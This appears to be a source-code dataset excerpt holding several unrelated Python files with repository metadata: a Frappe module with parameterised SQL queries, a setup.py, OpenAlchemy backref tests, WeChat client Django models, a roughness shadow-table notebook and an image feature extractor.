    The signature is fixed by frappe's custom-query contract; ``doctype``,
    ``searchfield`` and ``filters`` are unused here.
    """
    return _get(txt, start, page_len)
def _get(text=None, start=0, page_len=5):
    """Search active (non-left) employees by id or name, paginated.

    Returns (name, employee_name) rows ordered by employee name.

    Security fix: the search text and paging values are now passed as bound
    parameters -- the original interpolated them into the SQL string with
    ``str.format``, which permitted SQL injection via the search box.
    """
    return frappe.db.sql(
        """select distinct t1.name, t1.employee_name
        from tabEmployee t1
        where t1.status != 'left'
        and (t1.name like %(txt)s or t1.employee_name like %(txt)s)
        order by t1.employee_name
        limit %(start)s, %(page_len)s""",
        {
            "txt": "%{0}%".format(text or ""),
            "start": cint(start),
            "page_len": cint(page_len),
        })
@frappe.whitelist()
def get_directors(doctype, txt, searchfield, start, page_len, filters):
    """Link-field query: enabled users who hold the 'Directors' role.

    The signature is fixed by frappe's custom-query contract; only ``txt``
    is used.  The search text is already passed as a bound parameter.
    """
    return frappe.db.sql("""
SELECT u.name, concat(u.first_name, ' ', u.last_name)
FROM tabUser u, `tabHas Role` r
WHERE u.name = r.parent AND r.role = 'Directors'
AND u.enabled = 1 AND u.name LIKE %s
""", ("%" + txt + "%"))
@frappe.whitelist()
def get_approver_authorizer(emp):
    """Return approver/authorizer ids, user ids and names for an employee.

    The approver is the employee's manager (``reports_to``); the authorizer
    is the manager's manager, falling back to the manager.  An employee
    with no manager approves and authorizes for themselves.

    Security fix: ``emp`` is passed as a bound parameter in both queries
    instead of being formatted into the SQL string (SQL injection).
    """
    # check if the user reports to any one
    reports_to = frappe.db.sql(
        "SELECT reports_to FROM `tabEmployee` WHERE name = %s",
        (emp,), as_dict=1)[0]

    if reports_to.reports_to is None:
        data = [dict(approver=emp, authorizer=emp)]
    else:
        # first who the employee reports to, and up the ladder
        data = frappe.db.sql(
            """SELECT IFNULL(c.reports_to, %s) approver,
                      IFNULL(p.reports_to, c.reports_to) authorizer
               FROM tabEmployee c
               JOIN tabEmployee p ON (c.reports_to = p.name)
               WHERE c.name = %s""",
            (emp, emp), as_dict=1)

    # Resolve each id to (name, user_id, employee_name); blanks when missing.
    authorizer = approver = {}
    for datum in data:
        approver = frappe.get_value("Employee", datum.get('approver'), ["name", "user_id", "employee_name"])
        authorizer = frappe.get_value("Employee", datum.get('authorizer'), ["name", "user_id", "employee_name"])
        if not authorizer:
            authorizer = ["", "", ""]
        if not approver:
            approver = ["", "", ""]

    # NOTE(review): if ``data`` is empty (manager row missing despite
    # reports_to being set), approver stays {} and the lookups below fail --
    # confirm this cannot occur in practice.
    return [{
        "approver": approver[0],
        "authorizer": authorizer[0],
        "approver_name": approver[2],
        "authorizer_name": authorizer[2],
        "approver_user_id": approver[1],
        "authorizer_user_id": authorizer[1]
    }]
@frappe.whitelist()
def resolve_work_order(docname):
    """Mark a Work Order as Resolved.  Called from the client on Stop/Unstop.

    Updates the row directly with SQL (bypassing document validation) after
    verifying the caller has write permission on Work Order.  Returns True.

    Security fix: ``docname`` is passed as a bound parameter instead of
    being interpolated into the SQL string (SQL injection).
    """
    status = 'Resolved'
    if not frappe.has_permission("Work Order", "write"):
        frappe.throw(_("Not permitted"), frappe.PermissionError)
    frappe.db.sql(
        """update `tabWork Order`
        set status = 'Resolved', modified = %s, modified_by = %s, skip_transfer = 1
        where name = %s""",
        (datetime.datetime.now(), frappe.session.user, docname))
    frappe.msgprint(_("Work Order has been {0}").format(status))
    return True
@frappe.whitelist()
def get_discount(customer, transation_date):
    """Return the customer's entitled discount when the transaction date
    falls inside the customer's discount window, otherwise 0.

    Security fix: ``customer`` and the date are passed as bound parameters
    instead of being formatted into the SQL string (SQL injection).
    """
    d = getdate(transation_date)
    ds_status = frappe.db.sql(
        """SELECT entitled_discount_ FROM `tabCustomer`
        WHERE name = %s AND DATE(%s) >= discount_start AND DATE(%s) <= discount_end""",
        (customer, d, d))
    if ds_status:
        return ds_status[0][0]
    else:
        return 0
@frappe.whitelist()
def make_authority_to_load(source_name, target_doc=None):
    """Map a submitted Sales Order into a new 'Authority to Load' document.

    Standard frappe mapper: only submitted (docstatus == 1) Sales Orders
    are eligible; the new document keeps a link back via ``sales_order``.
    """
    def set_missing_values(source, target):
        # Link the new document back to its originating Sales Order.
        target.sales_order = source.name

    def update_item(source_doc, target_doc, source_parent):
        # No per-item post-processing is required.
        pass

    doc = get_mapped_doc("Sales Order", source_name, {
        "Sales Order": {
            "doctype": "Authority to Load",
            "validation": {
                "docstatus": ["=", 1]
            },
            "field_map": {
                "sales_order": "name"
            },
            "add_if_empty": False,
            "postprocess": update_item,
            "condition": lambda doc: doc.docstatus == 1
        },
    }, target_doc, set_missing_values)

    return doc
| 2,838 | 0 | 133 |
2ad2349ebd91d0f237f9dcd36a17172e08a26534 | 1,139 | py | Python | setup.py | Doma1204/HC-05-HC-06_Bluetooth_Tool | 61636dd6e22ed0ed049b44727e6a63c0b4454f48 | [
"MIT"
] | 2 | 2020-10-09T10:18:16.000Z | 2021-01-16T18:40:47.000Z | setup.py | Doma1204/HC-05-HC-06_Bluetooth_Tool | 61636dd6e22ed0ed049b44727e6a63c0b4454f48 | [
"MIT"
] | null | null | null | setup.py | Doma1204/HC-05-HC-06_Bluetooth_Tool | 61636dd6e22ed0ed049b44727e6a63c0b4454f48 | [
"MIT"
] | 6 | 2020-03-28T14:48:53.000Z | 2021-03-25T05:57:29.000Z | import setuptools
# Read the long description from the README.  The encoding is given
# explicitly so the build does not depend on the platform's default locale.
with open("README.md", "r", encoding="utf-8") as fh:
    long_description = fh.read()

setuptools.setup(
    name="HC-05-ConfigTool",
    version="0.1.1",
    author="Joseph Lam",
    author_email="mhlamaf@connect.ust.hk",
    description="A terminal tool for configuring HC-05 with AT mode.",
    long_description=long_description,
    long_description_content_type="text/markdown",
    url="https://github.com/Doma1204/HC-05_Bluetooth_Tool",
    packages=setuptools.find_packages(),
    license="MIT",
    classifiers=[
        "Development Status :: 5 - Production/Stable",
        "Topic :: Utilities",
        "Natural Language :: English",
        "License :: OSI Approved :: MIT License",
        "Programming Language :: Python :: 3",
        "Programming Language :: Python :: 3.2",
        "Programming Language :: Python :: 3.3",
        "Programming Language :: Python :: 3.4",
        "Programming Language :: Python :: 3.5",
        "Programming Language :: Python :: 3.6",
        "Programming Language :: Python :: 3.7"
    ],
    python_requires='>=3',
    keywords="bluetooth hc-05",
    install_requires=["pyserial"]
)
| 33.5 | 70 | 0.628622 | import setuptools
# Read the long description from the README.  The encoding is given
# explicitly so the build does not depend on the platform's default locale.
with open("README.md", "r", encoding="utf-8") as fh:
    long_description = fh.read()

setuptools.setup(
    name="HC-05-ConfigTool",
    version="0.1.1",
    author="Joseph Lam",
    author_email="mhlamaf@connect.ust.hk",
    description="A terminal tool for configuring HC-05 with AT mode.",
    long_description=long_description,
    long_description_content_type="text/markdown",
    url="https://github.com/Doma1204/HC-05_Bluetooth_Tool",
    packages=setuptools.find_packages(),
    license="MIT",
    classifiers=[
        "Development Status :: 5 - Production/Stable",
        "Topic :: Utilities",
        "Natural Language :: English",
        "License :: OSI Approved :: MIT License",
        "Programming Language :: Python :: 3",
        "Programming Language :: Python :: 3.2",
        "Programming Language :: Python :: 3.3",
        "Programming Language :: Python :: 3.4",
        "Programming Language :: Python :: 3.5",
        "Programming Language :: Python :: 3.6",
        "Programming Language :: Python :: 3.7"
    ],
    python_requires='>=3',
    keywords="bluetooth hc-05",
    install_requires=["pyserial"]
)
| 0 | 0 | 0 |
b7bca4e34d657d3cc71070163dddac668fc8226b | 5,583 | py | Python | tests/open_alchemy/schemas/helpers/test_backref.py | rgreinho/OpenAlchemy | 23202bdecb94763d09b6d9e84eb9b29506c811ae | [
"Apache-2.0"
] | null | null | null | tests/open_alchemy/schemas/helpers/test_backref.py | rgreinho/OpenAlchemy | 23202bdecb94763d09b6d9e84eb9b29506c811ae | [
"Apache-2.0"
] | 53 | 2020-12-30T15:32:55.000Z | 2022-03-31T10:07:00.000Z | tests/open_alchemy/schemas/helpers/test_backref.py | rgreinho/OpenAlchemy | 23202bdecb94763d09b6d9e84eb9b29506c811ae | [
"Apache-2.0"
] | null | null | null | """Tests for backref schemas processing."""
import pytest
from open_alchemy.schemas import helpers
@pytest.mark.parametrize(
"schema, schemas, expected_backref",
[
pytest.param({}, {}, None, id="no items, allOf nor $ref"),
pytest.param(
{"$ref": "#/components/schemas/RefSchema"},
{"RefSchema": {}},
None,
id="$ref no backref",
),
pytest.param(
{"$ref": "#/components/schemas/RefSchema"},
{"RefSchema": {"x-backref": "schema"}},
"schema",
id="$ref backref",
),
pytest.param({"allOf": []}, {}, None, id="allOf empty"),
pytest.param(
{"allOf": [{"$ref": "#/components/schemas/RefSchema"}]},
{"RefSchema": {"x-backref": "schema"}},
"schema",
id="allOf single $ref",
),
pytest.param(
{"allOf": [{"x-backref": "schema"}]},
{},
"schema",
id="allOf single x-backref",
),
pytest.param({"allOf": [{}]}, {}, None, id="allOf single no backref"),
pytest.param({"allOf": [{}, {}]}, {}, None, id="allOf multiple no backref"),
pytest.param(
{"allOf": [{"$ref": "#/components/schemas/RefSchema"}, {}]},
{"RefSchema": {"x-backref": "schema"}},
"schema",
id="allOf multiple first",
),
pytest.param(
{
"allOf": [
{"$ref": "#/components/schemas/RefSchema"},
{"x-backref": "schema"},
]
},
{"RefSchema": {}},
"schema",
id="allOf multiple second",
),
pytest.param(
{
"allOf": [
{"$ref": "#/components/schemas/RefSchema"},
{"x-backref": "schema"},
]
},
{"RefSchema": {"x-backref": "schema"}},
"schema",
id="allOf multiple all",
),
pytest.param(
{"items": {"$ref": "#/components/schemas/RefSchema"}},
{"RefSchema": {"x-backref": "schema"}},
"schema",
id="items $ref backref",
),
pytest.param(
{"allOf": [{"items": {"$ref": "#/components/schemas/RefSchema"}}]},
{"RefSchema": {"x-backref": "schema"}},
"schema",
id="items allOf $ref backref",
),
],
)
@pytest.mark.schemas
def test_get(schema, schemas, expected_backref):
    """Check that helpers.backref.get resolves the expected backref.

    Parametrized over $ref / allOf / items combinations in ``schemas``.
    """
    assert helpers.backref.get(schemas, schema) == expected_backref
@pytest.mark.parametrize(
"schema, schemas, expected_result",
[
pytest.param({}, {}, False, id="no items, allOf nor $ref"),
pytest.param(
{"$ref": "#/components/schemas/RefSchema"},
{"RefSchema": {}},
False,
id="$ref no backref",
),
pytest.param(
{"$ref": "#/components/schemas/RefSchema"},
{"RefSchema": {"x-backref": "schema"}},
True,
id="$ref backref",
),
pytest.param({"allOf": []}, {}, False, id="allOf empty"),
pytest.param(
{"allOf": [{"$ref": "#/components/schemas/RefSchema"}]},
{"RefSchema": {"x-backref": "schema"}},
True,
id="allOf single $ref",
),
pytest.param(
{"allOf": [{"x-backref": "schema"}]},
{},
True,
id="allOf single x-backref",
),
pytest.param({"allOf": [{}]}, {}, False, id="allOf single no backref"),
pytest.param({"allOf": [{}, {}]}, {}, False, id="allOf multiple no backref"),
pytest.param(
{"allOf": [{"$ref": "#/components/schemas/RefSchema"}, {}]},
{"RefSchema": {"x-backref": "schema"}},
True,
id="allOf multiple first",
),
pytest.param(
{
"allOf": [
{"$ref": "#/components/schemas/RefSchema"},
{"x-backref": "schema"},
]
},
{"RefSchema": {}},
True,
id="allOf multiple second",
),
pytest.param(
{
"allOf": [
{"$ref": "#/components/schemas/RefSchema"},
{"x-backref": "schema"},
]
},
{"RefSchema": {"x-backref": "schema"}},
True,
id="allOf multiple all",
),
pytest.param(
{"items": {"$ref": "#/components/schemas/RefSchema"}},
{"RefSchema": {"x-backref": "schema"}},
True,
id="items $ref backref",
),
pytest.param(
{"allOf": [{"items": {"$ref": "#/components/schemas/RefSchema"}}]},
{"RefSchema": {"x-backref": "schema"}},
True,
id="items allOf $ref backref",
),
],
)
@pytest.mark.schemas
def test_defined(schema, schemas, expected_result):
    """Check that helpers.backref.defined reports whether a backref exists.

    Parametrized over $ref / allOf / items combinations in ``schemas``.
    """
    assert helpers.backref.defined(schemas, schema) == expected_result
| 31.721591 | 85 | 0.454594 | """Tests for backref schemas processing."""
import pytest
from open_alchemy.schemas import helpers
@pytest.mark.parametrize(
"schema, schemas, expected_backref",
[
pytest.param({}, {}, None, id="no items, allOf nor $ref"),
pytest.param(
{"$ref": "#/components/schemas/RefSchema"},
{"RefSchema": {}},
None,
id="$ref no backref",
),
pytest.param(
{"$ref": "#/components/schemas/RefSchema"},
{"RefSchema": {"x-backref": "schema"}},
"schema",
id="$ref backref",
),
pytest.param({"allOf": []}, {}, None, id="allOf empty"),
pytest.param(
{"allOf": [{"$ref": "#/components/schemas/RefSchema"}]},
{"RefSchema": {"x-backref": "schema"}},
"schema",
id="allOf single $ref",
),
pytest.param(
{"allOf": [{"x-backref": "schema"}]},
{},
"schema",
id="allOf single x-backref",
),
pytest.param({"allOf": [{}]}, {}, None, id="allOf single no backref"),
pytest.param({"allOf": [{}, {}]}, {}, None, id="allOf multiple no backref"),
pytest.param(
{"allOf": [{"$ref": "#/components/schemas/RefSchema"}, {}]},
{"RefSchema": {"x-backref": "schema"}},
"schema",
id="allOf multiple first",
),
pytest.param(
{
"allOf": [
{"$ref": "#/components/schemas/RefSchema"},
{"x-backref": "schema"},
]
},
{"RefSchema": {}},
"schema",
id="allOf multiple second",
),
pytest.param(
{
"allOf": [
{"$ref": "#/components/schemas/RefSchema"},
{"x-backref": "schema"},
]
},
{"RefSchema": {"x-backref": "schema"}},
"schema",
id="allOf multiple all",
),
pytest.param(
{"items": {"$ref": "#/components/schemas/RefSchema"}},
{"RefSchema": {"x-backref": "schema"}},
"schema",
id="items $ref backref",
),
pytest.param(
{"allOf": [{"items": {"$ref": "#/components/schemas/RefSchema"}}]},
{"RefSchema": {"x-backref": "schema"}},
"schema",
id="items allOf $ref backref",
),
],
)
@pytest.mark.schemas
def test_get(schema, schemas, expected_backref):
    """Check that helpers.backref.get resolves the expected backref.

    Parametrized over $ref / allOf / items combinations in ``schemas``.
    """
    assert helpers.backref.get(schemas, schema) == expected_backref
@pytest.mark.parametrize(
    "schema, schemas, expected_result",
    [
        # base case: nothing that could carry a backref
        pytest.param({}, {}, False, id="no items, allOf nor $ref"),
        # direct $ref cases: backref lives (or not) on the referenced schema
        pytest.param(
            {"$ref": "#/components/schemas/RefSchema"},
            {"RefSchema": {}},
            False,
            id="$ref no backref",
        ),
        pytest.param(
            {"$ref": "#/components/schemas/RefSchema"},
            {"RefSchema": {"x-backref": "schema"}},
            True,
            id="$ref backref",
        ),
        # allOf cases: the backref may sit on a referenced schema or inline
        pytest.param({"allOf": []}, {}, False, id="allOf empty"),
        pytest.param(
            {"allOf": [{"$ref": "#/components/schemas/RefSchema"}]},
            {"RefSchema": {"x-backref": "schema"}},
            True,
            id="allOf single $ref",
        ),
        pytest.param(
            {"allOf": [{"x-backref": "schema"}]},
            {},
            True,
            id="allOf single x-backref",
        ),
        pytest.param({"allOf": [{}]}, {}, False, id="allOf single no backref"),
        pytest.param({"allOf": [{}, {}]}, {}, False, id="allOf multiple no backref"),
        pytest.param(
            {"allOf": [{"$ref": "#/components/schemas/RefSchema"}, {}]},
            {"RefSchema": {"x-backref": "schema"}},
            True,
            id="allOf multiple first",
        ),
        pytest.param(
            {
                "allOf": [
                    {"$ref": "#/components/schemas/RefSchema"},
                    {"x-backref": "schema"},
                ]
            },
            {"RefSchema": {}},
            True,
            id="allOf multiple second",
        ),
        pytest.param(
            {
                "allOf": [
                    {"$ref": "#/components/schemas/RefSchema"},
                    {"x-backref": "schema"},
                ]
            },
            {"RefSchema": {"x-backref": "schema"}},
            True,
            id="allOf multiple all",
        ),
        # array (items) cases: backref carried through the item schema
        pytest.param(
            {"items": {"$ref": "#/components/schemas/RefSchema"}},
            {"RefSchema": {"x-backref": "schema"}},
            True,
            id="items $ref backref",
        ),
        pytest.param(
            {"allOf": [{"items": {"$ref": "#/components/schemas/RefSchema"}}]},
            {"RefSchema": {"x-backref": "schema"}},
            True,
            id="items allOf $ref backref",
        ),
    ],
)
@pytest.mark.schemas
def test_defined(schema, schemas, expected_result):
    """
    GIVEN schema, schemas and expected result
    WHEN defined is called with the schema and schemas
    THEN the expected result is returned.
    """
    # defined() reports whether an x-backref is reachable from the schema
    # (directly, via $ref, via allOf, or through an items schema).
    returned_result = helpers.backref.defined(schemas, schema)
    assert returned_result == expected_result
| 0 | 0 | 0 |
b2231af1d072a01b4fde2eaed8a95b60c78314e2 | 3,637 | py | Python | src/wechat_client/models.py | redhead520/django-blog | 1ae4694a9e063f79b96b77bdb6f153aceea259c8 | [
"MIT"
] | null | null | null | src/wechat_client/models.py | redhead520/django-blog | 1ae4694a9e063f79b96b77bdb6f153aceea259c8 | [
"MIT"
] | null | null | null | src/wechat_client/models.py | redhead520/django-blog | 1ae4694a9e063f79b96b77bdb6f153aceea259c8 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from django.db import models
from django.contrib.auth.models import User
from wechat_client import weclient
import os
| 37.885417 | 137 | 0.590047 | # -*- coding: utf-8 -*-
from django.db import models
from django.contrib.auth.models import User
from wechat_client import weclient
import os
class WeChat(models.Model):
    """A desktop WeChat client account bound to a Django login user.

    Tracks whether the account is currently logged in (``online``) and
    proxies login / QR-code / messaging operations to ``weclient``.
    """
    # Django login account that owns this WeChat account.
    user = models.ForeignKey(User, verbose_name='登入账号', on_delete=models.CASCADE, blank=False)
    # WeChat account identifier (as reported by the client).
    wx_account = models.CharField('微信账号', blank=False, max_length=50)
    # account_path = models.FilePathField(path='./wechat_client/static/image/account', verbose_name='账号图片地址', max_length=100, blank=True)
    # Whether the account is currently logged in to the WeChat client.
    online = models.BooleanField('是否已登入', default=False, blank=False)
    # Whether this account is enabled for use.
    active = models.BooleanField('是否启用', default=True, blank=False)
    def __str__(self):
        """Render as ``<django username>[<wechat account>]``."""
        return '{}[{}]'.format(self.user.username, self.wx_account)
    class Meta:
        ordering = ['user', 'wx_account']
        verbose_name = "微信账号"
        verbose_name_plural = verbose_name
        get_latest_by = 'id'
    @classmethod
    def get_online_wx(cls, user_id):
        """Return ``(wechat, 'success')`` for the user's first account that is
        actually logged in, re-syncing stale ``online`` flags along the way;
        otherwise ``(None, <error message>)``.
        """
        online_wx = cls.objects.filter(user=user_id, online=True).first()
        if online_wx:
            if weclient.check_account(online_wx.wx_account):
                return online_wx, 'success'
            else:
                # DB said online but the client disagrees -- clear the flag.
                online_wx.online = False
                online_wx.save()
        # Fall back to probing every account this user owns.
        wxs = WeChat.objects.filter(user=user_id)
        for outline_wx in wxs:
            if weclient.check_account(outline_wx.wx_account):
                outline_wx.online = True
                outline_wx.save()
                return outline_wx, 'success'
        return None, '您的微信账号尚未登入!' if wxs else '您尚未有用账户,请联系工作人员!'
    @classmethod
    def get_qr_code(cls, user_id):
        """Request a login QR code from the WeChat client.

        Returns ``(data, 'success')`` with ``data['url']`` rewritten to a
        static temp-image URL, ``(None, msg)`` if the user is already logged
        in, or ``('', msg)`` if the client could not start a login.
        """
        url = ''
        online_wx = cls.objects.filter(user=user_id, online=True).first()
        if online_wx and cls.check_online_wx(user_id):
            return None, '你的微信已经登入了'
        else:
            outline_wx = cls.objects.filter(user=user_id, online=False).first()
            if outline_wx and cls.check_online_wx(user_id):
                return None, '你的微信已经登入了'
            data = weclient.login()
            if data:
                # Expose the QR image through the static temp directory.
                url = '/static/image/temp/' + os.path.split(data['url'])[1]
                data.update({'url': url})
                return data, 'success'
        return url, '服务器无法登入微信,请联系管理员!'
    def send_msg(self, friends, content, msg_type='text'):
        """Send ``content`` from this account to each friend; always True."""
        for friend in friends:
            weclient.send_msg(self.wx_account, friend, content, msg_type)
        return True
    @classmethod
    def check_login(cls, user_id, hwnd, wait=False):
        """Return True if the client window ``hwnd`` is logged in, refreshing
        the user's ``online`` flags as a side effect."""
        is_login = weclient.check_login(hwnd, wait=wait)
        if is_login:
            cls.check_online_wx(user_id)
            return True
        return False
    @classmethod
    def check_online_wx(cls, user_id=None):
        """Reconcile DB ``online`` flags with the client's live account list.

        Returns the (now online) account belonging to ``user_id`` if any,
        else None.
        """
        result = None
        account_mapping = weclient.get_account_list()
        for on in cls.objects.filter(online=True):
            if on.wx_account not in account_mapping:
                # No longer present in the client: mark offline.
                on.online = False
                on.save()
            else:
                account_mapping.pop(on.wx_account)
                if on.user.id == user_id:
                    result = on
        # Remaining entries are online in the client but not flagged in DB.
        for account, kwnd in account_mapping.items():
            wx_account = cls.objects.filter(wx_account=account).first()
            if not wx_account:
                # NOTE(review): account is unknown to the DB, yet login() is
                # triggered -- confirm this is the intended behavior.
                weclient.login()
            else:
                if not wx_account.online:
                    wx_account.online = True
                    # wx_account.account_path = '{}.jpg'.format(account)
                    wx_account.save()
                if wx_account.user.id == user_id:
                    result = wx_account
        return result
| 2,750 | 892 | 23 |
4cee8f58f095df607156ffd69e401c13cb99b707 | 3,550 | py | Python | examples/explore_lookup.py | NAU-PIXEL/roughness | dfaa3d2bc448a2ca19cb2d6001cc5dcf8ee26f82 | [
"MIT"
] | null | null | null | examples/explore_lookup.py | NAU-PIXEL/roughness | dfaa3d2bc448a2ca19cb2d6001cc5dcf8ee26f82 | [
"MIT"
] | 2 | 2021-11-18T16:26:19.000Z | 2021-11-18T16:39:08.000Z | examples/explore_lookup.py | NAU-PIXEL/roughness | dfaa3d2bc448a2ca19cb2d6001cc5dcf8ee26f82 | [
"MIT"
] | 1 | 2021-10-09T08:01:11.000Z | 2021-10-09T08:01:11.000Z | # ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: percent
# format_version: '1.3'
# jupytext_version: 1.12.0
# kernelspec:
# display_name: 'Python 3.7.7 64-bit (''.venv'': poetry)'
# name: python3
# ---
# %% [markdown]
# # Interactive plots to explore line of sight / shadowing tables
#
# ## Setup
# %%
import matplotlib.pyplot as plt
import ipywidgets as ipyw
from ipywidgets import interact
from roughness import plotting as rp
from roughness import roughness as rn
from roughness import make_los_table as mlt
# Load lookups (losfrac, Num los facets, Num facets total)
lookup = rn.load_los_lookup(mlt.FLOOKUP)
# Get coord arrays and interactive plot sliders for rms, inc, az
rmss = lookup.rms.values
incs = lookup.inc.values
azs = lookup.az.values
slopes = lookup.theta.values
rms_slider = ipyw.IntSlider(20, min=rmss.min(), max=rmss.max(), step=1)
inc_slider = ipyw.IntSlider(30, min=incs.min(), max=incs.max(), step=1)
az_slider = ipyw.IntSlider(270, min=azs.min(), max=azs.max(), step=15)
# %% [markdown]
# ## Shadow table
# %%
@interact
def plot_shadow_table(rms=rms_slider, inc=inc_slider, az=az_slider):
"""Plot shadowing conditions at rms, inc, az."""
shadow_table = rn.get_shadow_table(rms, inc, az, lookup)
clabel = "P(shadowed)"
ax = rp.plot_slope_az_table(shadow_table, True, clabel)
ax.set_title("Fraction of facets shadowed in slope / az bin")
# %% [markdown]
# ## View table
# %%
@interact
def plot_shadow_table(rms=rms_slider, inc=inc_slider, az=az_slider):
"""Plot shadowing conditions at rms, inc, az."""
view_table = rn.get_view_table(rms, inc, az, lookup)
clabel = "P(visible)"
ax = rp.plot_slope_az_table(view_table, True, clabel)
ax.set_title("Fraction of facets visible in slope / az bin")
# %% [markdown]
# ## Total facets
# %%
@interact
def plot_shadow_table(rms=rms_slider, inc=inc_slider, az=az_slider):
"""Plot shadowing conditions at rms, inc, az."""
total_facet_table = rn.get_los_table(rms, inc, az, lookup, "prob")
clabel = "Total facets"
ax = rp.plot_slope_az_table(total_facet_table, True, clabel)
ax.set_title("Total facet count in slope / az bin")
# %% [markdown]
# ## Line of sight facets
# %%
@interact
def plot_shadow_table(rms=rms_slider, inc=inc_slider, az=az_slider):
"""Plot shadowing conditions at rms, inc, az."""
los_facet_table = rn.get_los_table(rms, inc, az, lookup, "los")
clabel = "LOS facets"
ax = rp.plot_slope_az_table(los_facet_table, True, clabel)
ax.set_title("Line of sight facet count in slope / az bin")
# %%
titles = [
"Fraction of facets shadowed in slope / az bin",
"Norm prob of visible facets in slope / az bin",
"Line of sight facet count in slope / az bin",
"Total facet count in slope / az bin",
]
clabels = [
"P(shadowed)",
"P(visible)/sum(visible)",
"N(lineofsight)",
"N(total)",
]
@interact
def plot_all_tables(rms=rms_slider, inc=inc_slider, az=az_slider):
"""Plot shadowing conditions at rms, inc, az."""
_, axs = plt.subplots(2, 2, figsize=(12, 10))
tables = [
rn.get_shadow_table(rms, inc, az, lookup),
rn.get_view_table(rms, inc, az, lookup),
rn.get_los_table(rms, inc, az, lookup, "los"),
rn.get_los_table(rms, inc, az, lookup, "total"),
]
for i, ax in enumerate(axs.flatten()):
cmap_r = i == 0
ax = rp.plot_slope_az_table(tables[i], cmap_r, clabels[i], ax)
ax.set_title(titles[i])
# %%
| 28.4 | 71 | 0.668451 | # ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: percent
# format_version: '1.3'
# jupytext_version: 1.12.0
# kernelspec:
# display_name: 'Python 3.7.7 64-bit (''.venv'': poetry)'
# name: python3
# ---
# %% [markdown]
# # Interactive plots to explore line of sight / shadowing tables
#
# ## Setup
# %%
import matplotlib.pyplot as plt
import ipywidgets as ipyw
from ipywidgets import interact
from roughness import plotting as rp
from roughness import roughness as rn
from roughness import make_los_table as mlt
# Load lookups (losfrac, Num los facets, Num facets total)
lookup = rn.load_los_lookup(mlt.FLOOKUP)
# Get coord arrays and interactive plot sliders for rms, inc, az
rmss = lookup.rms.values
incs = lookup.inc.values
azs = lookup.az.values
slopes = lookup.theta.values
# Slider defaults (rms=20, inc=30, az=270) are clamped to the lookup's
# coordinate extents; azimuth moves in 15-degree steps.
rms_slider = ipyw.IntSlider(20, min=rmss.min(), max=rmss.max(), step=1)
inc_slider = ipyw.IntSlider(30, min=incs.min(), max=incs.max(), step=1)
az_slider = ipyw.IntSlider(270, min=azs.min(), max=azs.max(), step=15)
# %% [markdown]
# ## Shadow table
# %%
@interact
def plot_shadow_table(rms=rms_slider, inc=inc_slider, az=az_slider):
    """Plot the fraction of shadowed facets per slope/az bin for the
    slider-selected rms slope, solar incidence and azimuth."""
    shadow_table = rn.get_shadow_table(rms, inc, az, lookup)
    clabel = "P(shadowed)"
    ax = rp.plot_slope_az_table(shadow_table, True, clabel)
    ax.set_title("Fraction of facets shadowed in slope / az bin")
# %% [markdown]
# ## View table
# %%
@interact
def plot_shadow_table(rms=rms_slider, inc=inc_slider, az=az_slider):
    """Plot the fraction of *visible* facets per slope/az bin.

    NOTE(review): this cell reuses the name ``plot_shadow_table`` (shadowing
    the shadow-table cell above); a name like ``plot_view_table`` would be
    clearer.
    """
    view_table = rn.get_view_table(rms, inc, az, lookup)
    clabel = "P(visible)"
    ax = rp.plot_slope_az_table(view_table, True, clabel)
    ax.set_title("Fraction of facets visible in slope / az bin")
# %% [markdown]
# ## Total facets
# %%
@interact
def plot_shadow_table(rms=rms_slider, inc=inc_slider, az=az_slider):
    """Plot the total facet count per slope/az bin.

    NOTE(review): the name again shadows ``plot_shadow_table``, and the table
    is fetched with key "prob" while plot_all_tables below uses "total" for
    the same title -- confirm which key is intended here.
    """
    total_facet_table = rn.get_los_table(rms, inc, az, lookup, "prob")
    clabel = "Total facets"
    ax = rp.plot_slope_az_table(total_facet_table, True, clabel)
    ax.set_title("Total facet count in slope / az bin")
# %% [markdown]
# ## Line of sight facets
# %%
@interact
def plot_shadow_table(rms=rms_slider, inc=inc_slider, az=az_slider):
    """Plot the line-of-sight facet count per slope/az bin.

    NOTE(review): name shadows the earlier cells' ``plot_shadow_table``.
    """
    los_facet_table = rn.get_los_table(rms, inc, az, lookup, "los")
    clabel = "LOS facets"
    ax = rp.plot_slope_az_table(los_facet_table, True, clabel)
    ax.set_title("Line of sight facet count in slope / az bin")
# %%
# Titles and colorbar labels for the 2x2 summary figure below; element order
# must match the `tables` list built in plot_all_tables
# (shadow, view, los, total).
titles = [
    "Fraction of facets shadowed in slope / az bin",
    "Norm prob of visible facets in slope / az bin",
    "Line of sight facet count in slope / az bin",
    "Total facet count in slope / az bin",
]
clabels = [
    "P(shadowed)",
    "P(visible)/sum(visible)",
    "N(lineofsight)",
    "N(total)",
]
@interact
def plot_all_tables(rms=rms_slider, inc=inc_slider, az=az_slider):
    """Plot shadow, view, line-of-sight and total facet tables in a 2x2
    grid for the slider-selected rms slope, incidence and azimuth."""
    _, axs = plt.subplots(2, 2, figsize=(12, 10))
    # Order must match the module-level `titles` / `clabels` lists.
    tables = [
        rn.get_shadow_table(rms, inc, az, lookup),
        rn.get_view_table(rms, inc, az, lookup),
        rn.get_los_table(rms, inc, az, lookup, "los"),
        rn.get_los_table(rms, inc, az, lookup, "total"),
    ]
    for i, ax in enumerate(axs.flatten()):
        # Only the shadow table (i == 0) uses the reversed colormap.
        cmap_r = i == 0
        ax = rp.plot_slope_az_table(tables[i], cmap_r, clabels[i], ax)
        ax.set_title(titles[i])
# %%
| 0 | 0 | 0 |
48f772048b20bc547fb1799f586eaf72799e17cd | 2,262 | py | Python | src/feature-extractor/feature_extractor.py | s0umitra/Image-Captioning | 272c24bd736579ae69a7963be5fd452b5cfb9818 | [
"MIT"
] | null | null | null | src/feature-extractor/feature_extractor.py | s0umitra/Image-Captioning | 272c24bd736579ae69a7963be5fd452b5cfb9818 | [
"MIT"
] | null | null | null | src/feature-extractor/feature_extractor.py | s0umitra/Image-Captioning | 272c24bd736579ae69a7963be5fd452b5cfb9818 | [
"MIT"
] | null | null | null | import os
from pickle import dump
from time import time
from keras.applications.inception_v3 import InceptionV3
from keras.models import Model
from src.lib.libic import init, set_opener
from src.lib.model_lib import feature_extractor
if __name__ == '__main__':
parameters = initialize()
total, start = process_image(parameters)
print("Total Features Extracted :", total)
print("Processing Time :", time() - start, "sec")
| 25.704545 | 98 | 0.657825 | import os
from pickle import dump
from time import time
from keras.applications.inception_v3 import InceptionV3
from keras.models import Model
